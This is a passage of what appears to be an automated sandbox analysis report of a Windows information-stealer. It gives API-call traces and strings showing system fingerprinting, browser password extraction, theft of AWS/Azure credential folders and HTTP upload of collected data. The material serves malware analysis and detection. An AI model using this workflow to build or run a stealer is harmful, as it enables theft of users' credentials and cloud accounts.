                                                                                                                                                                      • Part of subcall function 00411997: CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 004119BE
                                                                                                                                                                      • Part of subcall function 00411997: CoCreateInstance.OLE32(00432F00,00000000,00000001,00432E30,?), ref: 004119D8
                                                                                                                                                                      • Part of subcall function 00411997: CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 00411A0E
                                                                                                                                                                      • Part of subcall function 00411997: VariantInit.OLEAUT32(?), ref: 00411A5D
                                                                                                                                                                      • Part of subcall function 00410C85: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00401385), ref: 00410C91
                                                                                                                                                                      • Part of subcall function 00410C85: HeapAlloc.KERNEL32(00000000,?,?,?,00401385), ref: 00410C98
                                                                                                                                                                      • Part of subcall function 00410C85: GetComputerNameA.KERNEL32(00000000,00401385), ref: 00410CAC
                                                                                                                                                                      • Part of subcall function 00410C53: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,004013B9), ref: 00410C5F
                                                                                                                                                                      • Part of subcall function 00410C53: RtlAllocateHeap.NTDLL(00000000,?,?,?,004013B9), ref: 00410C66
                                                                                                                                                                      • Part of subcall function 00410C53: GetUserNameA.ADVAPI32(00000000,004013B9), ref: 00410C7A
                                                                                                                                                                      • Part of subcall function 00411563: CreateDCA.GDI32(00000000,00000000,00000000,00000000), ref: 00411575
                                                                                                                                                                      • Part of subcall function 00411563: GetDeviceCaps.GDI32(00000000,00000008), ref: 00411580
                                                                                                                                                                      • Part of subcall function 00411563: GetDeviceCaps.GDI32(00000000,0000000A), ref: 0041158B
                                                                                                                                                                      • Part of subcall function 00411563: ReleaseDC.USER32(00000000,00000000), ref: 00411596
                                                                                                                                                                      • Part of subcall function 00411563: GetProcessHeap.KERNEL32(00000000,00000104,?,?,00414098,?,Display Resolution: ,004368F4,00000000,User Name: ,004368E4,00000000,Computer Name: ,004368D0,AV: ,004368C4), ref: 004115A2
                                                                                                                                                                      • Part of subcall function 00411563: HeapAlloc.KERNEL32(00000000,?,?,00414098,?,Display Resolution: ,004368F4,00000000,User Name: ,004368E4,00000000,Computer Name: ,004368D0,AV: ,004368C4,Install Date: ), ref: 004115A9
                                                                                                                                                                      • Part of subcall function 00411563: wsprintfA.USER32 ref: 004115BB
                                                                                                                                                                      • Part of subcall function 00410DDB: GetKeyboardLayoutList.USER32(00000000,00000000,0043670D,?,?), ref: 00410E0C
                                                                                                                                                                      • Part of subcall function 00410DDB: LocalAlloc.KERNEL32(00000040,00000000), ref: 00410E1A
                                                                                                                                                                      • Part of subcall function 00410DDB: GetKeyboardLayoutList.USER32(00000000,00000000), ref: 00410E28
                                                                                                                                                                      • Part of subcall function 00410DDB: GetLocaleInfoA.KERNEL32(?,00000002,?,00000200,00000000), ref: 00410E57
                                                                                                                                                                      • Part of subcall function 00410DDB: LocalFree.KERNEL32(00000000), ref: 00410EFF
                                                                                                                                                                      • Part of subcall function 00410D2E: GetProcessHeap.KERNEL32(00000000,00000104,?), ref: 00410D49
                                                                                                                                                                      • Part of subcall function 00410D2E: HeapAlloc.KERNEL32(00000000), ref: 00410D50
                                                                                                                                                                      • Part of subcall function 00410D2E: GetTimeZoneInformation.KERNEL32(?), ref: 00410D5F
                                                                                                                                                                      • Part of subcall function 00410D2E: wsprintfA.USER32 ref: 00410D7D
                                                                                                                                                                      • Part of subcall function 00410F51: GetProcessHeap.KERNEL32(00000000,00000104,00000000,?,?,?,00414252,Processor: ,[Hardware],00436950,00000000,TimeZone: ,00436940,00000000,Local Time: ,0043692C), ref: 00410F65
                                                                                                                                                                      • Part of subcall function 00410F51: HeapAlloc.KERNEL32(00000000,?,?,?,00414252,Processor: ,[Hardware],00436950,00000000,TimeZone: ,00436940,00000000,Local Time: ,0043692C,Keyboard Languages: ,00436910), ref: 00410F6C
                                                                                                                                                                      • Part of subcall function 00410F51: RegOpenKeyExA.KERNEL32(80000002,00000000,00020119,00436888,?,?,?,00414252,Processor: ,[Hardware],00436950,00000000,TimeZone: ,00436940,00000000,Local Time: ), ref: 00410F8A
                                                                                                                                                                      • Part of subcall function 00410F51: RegQueryValueExA.KERNEL32(00436888,00000000,00000000,00000000,000000FF,?,?,?,00414252,Processor: ,[Hardware],00436950,00000000,TimeZone: ,00436940,00000000), ref: 00410FA6
                                                                                                                                                                      • Part of subcall function 00410F51: RegCloseKey.ADVAPI32(00436888,?,?,?,00414252,Processor: ,[Hardware],00436950,00000000,TimeZone: ,00436940,00000000,Local Time: ,0043692C,Keyboard Languages: ,00436910), ref: 00410FAF
                                                                                                                                                                      • Part of subcall function 00411007: GetLogicalProcessorInformationEx.KERNELBASE(0000FFFF,00000000,?), ref: 0041107D
                                                                                                                                                                      • Part of subcall function 00411007: wsprintfA.USER32 ref: 004110DB
                                                                                                                                                                      • Part of subcall function 00410FBA: GetSystemInfo.KERNEL32(?), ref: 00410FD4
                                                                                                                                                                      • Part of subcall function 00410FBA: wsprintfA.USER32 ref: 00410FEC
                                                                                                                                                                      • Part of subcall function 00411119: GetProcessHeap.KERNEL32(00000000,00000104,?,Keyboard Languages: ,00436910,Display Resolution: ,004368F4,00000000,User Name: ,004368E4,00000000,Computer Name: ,004368D0,AV: ,004368C4,Install Date: ), ref: 00411131
                                                                                                                                                                      • Part of subcall function 00411119: HeapAlloc.KERNEL32(00000000), ref: 00411138
                                                                                                                                                                      • Part of subcall function 00411119: GlobalMemoryStatusEx.KERNEL32(?,?,00000040), ref: 00411154
                                                                                                                                                                      • Part of subcall function 00411119: wsprintfA.USER32 ref: 0041117A
                                                                                                                                                                      • Part of subcall function 00411192: EnumDisplayDevicesA.USER32(00000000,00000000,?,00000001), ref: 004111E9
                                                                                                                                                                      • Part of subcall function 004114A5: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00436712,?,?), ref: 004114D4
                                                                                                                                                                      • Part of subcall function 004114A5: Process32First.KERNEL32(00000000,00000128), ref: 004114E4
                                                                                                                                                                      • Part of subcall function 004114A5: Process32Next.KERNEL32(00000000,00000128), ref: 00411542
                                                                                                                                                                      • Part of subcall function 004114A5: CloseHandle.KERNEL32(00000000), ref: 0041154D
                                                                                                                                                                      • Part of subcall function 00411203: RegOpenKeyExA.KERNEL32(?,00000000,00020019,?,0043670F,00000000,?,?), ref: 00411273
                                                                                                                                                                      • Part of subcall function 00411203: RegEnumKeyExA.KERNEL32(?,?,?,?,00000000,00000000,00000000,00000000), ref: 004112B0
                                                                                                                                                                      • Part of subcall function 00411203: wsprintfA.USER32 ref: 004112DD
                                                                                                                                                                      • Part of subcall function 00411203: RegOpenKeyExA.KERNEL32(?,?,00000000,00020019,?), ref: 004112FC
                                                                                                                                                                      • Part of subcall function 00411203: RegQueryValueExA.KERNEL32(?,00000000,000F003F,?,?), ref: 00411332
                                                                                                                                                                      • Part of subcall function 00411203: lstrlenA.KERNEL32(?), ref: 00411347
                                                                                                                                                                      • Part of subcall function 00411203: RegQueryValueExA.KERNEL32(?,00000000,000F003F,?,?,?,00436E8C), ref: 004113DC
                                                                                                                                                                      • Part of subcall function 00411203: RegCloseKey.ADVAPI32(?), ref: 00411446
                                                                                                                                                                      • Part of subcall function 00411203: RegCloseKey.ADVAPI32(?), ref: 00411472
                                                                                                                                                                    • lstrlenA.KERNEL32(?,?,?,?,?,?,?,?,Keyboard Languages: ,00436910,Display Resolution: ,004368F4,00000000,User Name: ,004368E4,00000000), ref: 00414563
                                                                                                                                                                      • Part of subcall function 00416E97: CreateThread.KERNEL32(00000000,00000000,00416DC6,?,00000000,00000000), ref: 00416F36
                                                                                                                                                                      • Part of subcall function 00416E97: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00416F3E
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.3371829647.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Heap$Process$Alloc$wsprintf$Close$CreateOpen$InitializeQueryValuelstrcatlstrcpy$InformationLocalNamelstrlen$BlanketCapsCurrentDeviceEnumHandleInfoInitInstanceKeyboardLayoutListProcess32ProxySecurityTimeVariant_memset$AllocateCharComputerDevicesDirectoryDisplayFileFirstFreeGlobalH_prolog3_catchH_prolog3_catch_LocaleLogicalMemoryModuleNextObjectProcessorProfileReleaseSingleSnapshotStatusSystemThreadToolhelp32UserVolumeWaitWindowsZone
                                                                                                                                                                    • String ID: AV: $Computer Name: $Cores: $Date: $Display Resolution: $GUID: $HWID: $Install Date: $Keyboard Languages: $Local Time: $MachineID: $Path: $Processor: $RAM: $Threads: $TimeZone: $User Name: $Version: $VideoCard: $Windows: $Work Dir: In memory$[Hardware]$[Processes]$[Software]$information.txt
                                                                                                                                                                    • API String ID: 3634126619-1014693891

                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                    APIs
                                                                                                                                                                      • Part of subcall function 00410795: StrCmpCA.SHLWAPI(?,?,?,00408863,?,?,?), ref: 0041079E
                                                                                                                                                                    • CopyFileA.KERNEL32(?,?,00000001), ref: 00408941
                                                                                                                                                                      • Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417621), ref: 00410538
                                                                                                                                                                      • Part of subcall function 004122B0: _memset.LIBCMT ref: 004122D7
                                                                                                                                                                      • Part of subcall function 004122B0: OpenProcess.KERNEL32(00001001,00000000,?,00000000,?), ref: 0041237D
                                                                                                                                                                      • Part of subcall function 004122B0: TerminateProcess.KERNEL32(00000000,00000000), ref: 0041238B
                                                                                                                                                                      • Part of subcall function 004122B0: CloseHandle.KERNEL32(00000000), ref: 00412392
                                                                                                                                                                      • Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
                                                                                                                                                                      • Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
                                                                                                                                                                      • Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650
                                                                                                                                                                      • Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD
                                                                                                                                                                      • Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
                                                                                                                                                                      • Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF
                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,000F423F), ref: 00408AA6
                                                                                                                                                                    • RtlAllocateHeap.NTDLL(00000000), ref: 00408AAD
                                                                                                                                                                    • StrCmpCA.SHLWAPI(?,ERROR_RUN_EXTRACTOR), ref: 00408B95
                                                                                                                                                                    • StrCmpCA.SHLWAPI(?,004371E8), ref: 00408BAB
                                                                                                                                                                    • StrCmpCA.SHLWAPI(?,004371EC), ref: 00408BD3
                                                                                                                                                                    • lstrlenA.KERNEL32(?), ref: 00408CF0
                                                                                                                                                                    • lstrlenA.KERNEL32(?), ref: 00408D0B
                                                                                                                                                                      • Part of subcall function 00416E97: CreateThread.KERNEL32(00000000,00000000,00416DC6,?,00000000,00000000), ref: 00416F36
                                                                                                                                                                      • Part of subcall function 00416E97: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00416F3E
                                                                                                                                                                    • DeleteFileA.KERNEL32(?), ref: 00408D4E
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.3371829647.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: lstrcpy$Processlstrlen$FileHeaplstrcat$AllocateCloseCopyCreateDeleteHandleObjectOpenSingleTerminateThreadWait_memset
                                                                                                                                                                    • String ID: ERROR_RUN_EXTRACTOR
                                                                                                                                                                    • API String ID: 2819533921-2709115261

                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                    APIs
                                                                                                                                                                      • Part of subcall function 00410549: lstrlenA.KERNEL32(?,?,00417174,004366CF,004366CE,?,?,?,?,0041858F), ref: 0041054F
                                                                                                                                                                      • Part of subcall function 00410549: lstrcpyA.KERNEL32(00000000,00000000,?,00417174,004366CF,004366CE,?,?,?,?,0041858F), ref: 00410581
                                                                                                                                                                      • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                                                                                      • Part of subcall function 004168C6: StrCmpCA.SHLWAPI(?,ERROR), ref: 0041691A
                                                                                                                                                                      • Part of subcall function 004168C6: lstrlenA.KERNEL32(?), ref: 00416925
                                                                                                                                                                      • Part of subcall function 004168C6: StrStrA.SHLWAPI(00000000,?), ref: 0041693A
                                                                                                                                                                      • Part of subcall function 004168C6: lstrlenA.KERNEL32(?), ref: 00416949
                                                                                                                                                                      • Part of subcall function 004168C6: lstrlenA.KERNEL32(00000000), ref: 00416962
                                                                                                                                                                      • Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD
                                                                                                                                                                    • StrCmpCA.SHLWAPI(?,ERROR), ref: 00416AA0
                                                                                                                                                                    • StrCmpCA.SHLWAPI(?,ERROR), ref: 00416AF9
                                                                                                                                                                    • StrCmpCA.SHLWAPI(?,ERROR), ref: 00416B59
                                                                                                                                                                    • StrCmpCA.SHLWAPI(?,ERROR), ref: 00416BB2
                                                                                                                                                                    • StrCmpCA.SHLWAPI(?,ERROR), ref: 00416BC8
                                                                                                                                                                    • StrCmpCA.SHLWAPI(?,ERROR), ref: 00416BDE
                                                                                                                                                                    • StrCmpCA.SHLWAPI(?,ERROR), ref: 00416BF0
                                                                                                                                                                    • Sleep.KERNEL32(0000EA60), ref: 00416BFF
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.3371829647.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_aspnet_regiis.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: lstrlen$lstrcpy$Sleep
                                                                                                                                                                    • String ID: .vA$ERROR$ERROR$ERROR$ERROR$ERROR$ERROR$ERROR$Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0$Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0$sqlite3.dll$sqlite3.dll$sqlp.dll$sqlp.dll
                                                                                                                                                                    • API String ID: 2840494320-4129404369

                                                                                                                                                                    APIs
                                                                                                                                                                      • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                                                                                      • Part of subcall function 00411C4A: GetSystemTime.KERNEL32(?,00436701,?), ref: 00411C79
                                                                                                                                                                      • Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
                                                                                                                                                                      • Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
                                                                                                                                                                      • Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650
                                                                                                                                                                      • Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
                                                                                                                                                                      • Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF
                                                                                                                                                                      • Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD
                                                                                                                                                                    • CopyFileA.KERNEL32(?,?,00000001), ref: 004085D3
                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,000F423F), ref: 00408628
                                                                                                                                                                    • RtlAllocateHeap.NTDLL(00000000), ref: 0040862F
                                                                                                                                                                    • lstrlenA.KERNEL32(?), ref: 004086CB
                                                                                                                                                                    • lstrcatA.KERNEL32(?), ref: 004086E4
                                                                                                                                                                    • lstrcatA.KERNEL32(?,?), ref: 004086EE
                                                                                                                                                                    • lstrcatA.KERNEL32(?,0043719C), ref: 004086FA
                                                                                                                                                                    • lstrcatA.KERNEL32(?,?), ref: 00408704
                                                                                                                                                                    • lstrcatA.KERNEL32(?,004371A0), ref: 00408710
                                                                                                                                                                    • lstrcatA.KERNEL32(?), ref: 0040871D
                                                                                                                                                                    • lstrcatA.KERNEL32(?,?), ref: 00408727
                                                                                                                                                                    • lstrcatA.KERNEL32(?,004371A4), ref: 00408733
                                                                                                                                                                    • lstrcatA.KERNEL32(?), ref: 00408740
                                                                                                                                                                    • lstrcatA.KERNEL32(?,?), ref: 0040874A
                                                                                                                                                                    • lstrcatA.KERNEL32(?,004371A8), ref: 00408756
                                                                                                                                                                    • lstrcatA.KERNEL32(?), ref: 00408763
                                                                                                                                                                    • lstrcatA.KERNEL32(?,?), ref: 0040876D
                                                                                                                                                                    • lstrcatA.KERNEL32(?,004371AC), ref: 00408779
                                                                                                                                                                    • lstrcatA.KERNEL32(?,004371B0), ref: 00408785
                                                                                                                                                                    • lstrlenA.KERNEL32(?), ref: 004087BE
                                                                                                                                                                    • DeleteFileA.KERNEL32(?), ref: 0040880B
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.3371829647.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_aspnet_regiis.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTime
                                                                                                                                                                    • String ID: passwords.txt
                                                                                                                                                                    • API String ID: 1956182324-347816968

                                                                                                                                                                    APIs
                                                                                                                                                                      • Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417621), ref: 00410538
                                                                                                                                                                      • Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AE8
                                                                                                                                                                      • Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AEE
                                                                                                                                                                      • Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AF4
                                                                                                                                                                      • Part of subcall function 00404AB6: lstrlenA.KERNEL32(000000FF,00000000,?), ref: 00404B06
                                                                                                                                                                      • Part of subcall function 00404AB6: InternetCrackUrlA.WININET(000000FF,00000000), ref: 00404B0E
                                                                                                                                                                      • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                                                                                    • InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 00404BCD
                                                                                                                                                                    • StrCmpCA.SHLWAPI(?), ref: 00404BEB
                                                                                                                                                                    • InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00404D83
                                                                                                                                                                    • HttpOpenRequestA.WININET(?,?,00000000,00000000,?,00000000), ref: 00404DC7
                                                                                                                                                                    • InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00404DF5
                                                                                                                                                                      • Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
                                                                                                                                                                      • Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
                                                                                                                                                                      • Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650
                                                                                                                                                                      • Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD
                                                                                                                                                                      • Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
                                                                                                                                                                      • Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF
                                                                                                                                                                    • lstrlenA.KERNEL32(?,00436953,",build_id,004377C4,------,004377B8,",hwid,004377A4,------), ref: 004050EE
                                                                                                                                                                    • lstrlenA.KERNEL32(?,?,00000000), ref: 00405101
                                                                                                                                                                    • HttpSendRequestA.WININET(00000000,?,00000000), ref: 0040510F
                                                                                                                                                                    • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 0040516C
                                                                                                                                                                    • InternetCloseHandle.WININET(00000000), ref: 00405177
                                                                                                                                                                    • InternetCloseHandle.WININET(?), ref: 0040518E
                                                                                                                                                                    • InternetCloseHandle.WININET(?), ref: 0040519A
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.3371829647.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_aspnet_regiis.jbxd
                                                                                                                                                                    Yara matches
Similarity
• API ID: Internet$lstrcpy$lstrlen$CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileOptionReadSend
• String ID: "$"$------$------$------$8wA$build_id$hwid
APIs
• GetTempPathW.KERNEL32(00000104,?), ref: 00401696
• wsprintfW.USER32 ref: 004016BC
• CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000100,00000000), ref: 004016E6
• GetProcessHeap.KERNEL32(00000008,000FFFFF), ref: 004016FE
• RtlAllocateHeap.NTDLL(00000000), ref: 00401705
• _time64.MSVCRT ref: 0040170E
• srand.MSVCRT ref: 00401715
• rand.MSVCRT ref: 0040171E
• _memset.LIBCMT ref: 0040172E
• WriteFile.KERNEL32(?,00000000,000FFFFF,?,00000000), ref: 00401746
• _memset.LIBCMT ref: 00401763
• CloseHandle.KERNEL32(?), ref: 00401771
• CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,04000100,00000000), ref: 0040178D
• ReadFile.KERNEL32(00000000,00000000,000FFFFF,?,00000000), ref: 004017A9
• _memset.LIBCMT ref: 004017BE
• GetProcessHeap.KERNEL32(00000000,00000000), ref: 004017C8
• RtlFreeHeap.NTDLL(00000000), ref: 004017CF
• CloseHandle.KERNEL32(?), ref: 004017DB
Memory Dump Source
• Source File: 00000003.00000002.3371829647.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: FileHeap$_memset$CloseCreateHandleProcess$AllocateFreePathReadTempWrite_time64randsrandwsprintf
• String ID: %s%s$delays.tmp
APIs
• _memset.LIBCMT ref: 004164E2
  • Part of subcall function 00411DBC: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,?), ref: 00411DFD
• lstrcatA.KERNEL32(?,00000000,?,00000000,?), ref: 00416501
• lstrcatA.KERNEL32(?,\.azure\), ref: 0041651E
  • Part of subcall function 00415FD1: wsprintfA.USER32 ref: 00416018
  • Part of subcall function 00415FD1: FindFirstFileA.KERNEL32(?,?), ref: 0041602F
  • Part of subcall function 00415FD1: StrCmpCA.SHLWAPI(?,00436AB4), ref: 00416050
  • Part of subcall function 00415FD1: StrCmpCA.SHLWAPI(?,00436AB8), ref: 0041606A
  • Part of subcall function 00415FD1: wsprintfA.USER32 ref: 00416091
  • Part of subcall function 00415FD1: StrCmpCA.SHLWAPI(?,00436647), ref: 004160A5
  • Part of subcall function 00415FD1: wsprintfA.USER32 ref: 004160C2
  • Part of subcall function 00415FD1: PathMatchSpecA.SHLWAPI(?,?), ref: 004160EF
  • Part of subcall function 00415FD1: lstrcatA.KERNEL32(?), ref: 00416125
  • Part of subcall function 00415FD1: lstrcatA.KERNEL32(?,00436AD0), ref: 00416137
  • Part of subcall function 00415FD1: lstrcatA.KERNEL32(?,?), ref: 0041614A
  • Part of subcall function 00415FD1: lstrcatA.KERNEL32(?,00436AD4), ref: 0041615C
  • Part of subcall function 00415FD1: lstrcatA.KERNEL32(?,?), ref: 00416170
• _memset.LIBCMT ref: 00416556
• lstrcatA.KERNEL32(?,00000000), ref: 00416578
• lstrcatA.KERNEL32(?,\.aws\), ref: 00416595
  • Part of subcall function 00415FD1: wsprintfA.USER32 ref: 004160D9
  • Part of subcall function 00415FD1: CopyFileA.KERNEL32(?,?,00000001), ref: 00416229
  • Part of subcall function 00415FD1: DeleteFileA.KERNEL32(?), ref: 0041629D
  • Part of subcall function 00415FD1: FindNextFileA.KERNEL32(?,?), ref: 004162FF
  • Part of subcall function 00415FD1: FindClose.KERNEL32(?), ref: 00416313
• _memset.LIBCMT ref: 004165CA
• lstrcatA.KERNEL32(?,00000000), ref: 004165EC
• lstrcatA.KERNEL32(?,\.IdentityService\), ref: 00416609
• _memset.LIBCMT ref: 0041663E
Similarity
• API ID: lstrcat$File_memsetwsprintf$Find$Path$CloseCopyDeleteFirstFolderMatchNextSpec
• String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
APIs
  • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
  • Part of subcall function 00411C4A: GetSystemTime.KERNEL32(?,00436701,?), ref: 00411C79
  • Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
  • Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
  • Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650
  • Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
  • Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF
  • Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD
• CopyFileA.KERNEL32(?,?,00000001), ref: 0040AC8A
• GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0040AD94
• RtlAllocateHeap.NTDLL(00000000), ref: 0040AD9B
• StrCmpCA.SHLWAPI(?,004373DC,00000000), ref: 0040AE4C
• StrCmpCA.SHLWAPI(?,004373E0), ref: 0040AE74
• lstrcatA.KERNEL32(00000000,?), ref: 0040AE98
• lstrcatA.KERNEL32(00000000,004373E4), ref: 0040AEA4
• lstrcatA.KERNEL32(00000000,?), ref: 0040AEAE
• lstrcatA.KERNEL32(00000000,004373E8), ref: 0040AEBA
• lstrcatA.KERNEL32(00000000,?), ref: 0040AEC4
• lstrcatA.KERNEL32(00000000,004373EC), ref: 0040AED0
• lstrcatA.KERNEL32(00000000,?), ref: 0040AEDA
• lstrcatA.KERNEL32(00000000,004373F0), ref: 0040AEE6
• lstrcatA.KERNEL32(00000000,?), ref: 0040AEF0
• lstrcatA.KERNEL32(00000000,004373F4), ref: 0040AEFC
• lstrcatA.KERNEL32(00000000,?), ref: 0040AF06
• lstrcatA.KERNEL32(00000000,004373F8), ref: 0040AF12
• lstrcatA.KERNEL32(00000000,?), ref: 0040AF1C
• lstrcatA.KERNEL32(00000000,004373FC), ref: 0040AF28
• lstrlenA.KERNEL32(00000000), ref: 0040AF7A
• lstrlenA.KERNEL32(?), ref: 0040AF95
• DeleteFileA.KERNEL32(?), ref: 0040AFD8
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.3371829647.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000463000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000467000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.000000000046B000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.000000000055A000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.000000000055D000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000563000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000582000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.00000000005A1000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.000000000063A000.00000040.00000400.00020000.00000000.sdmp
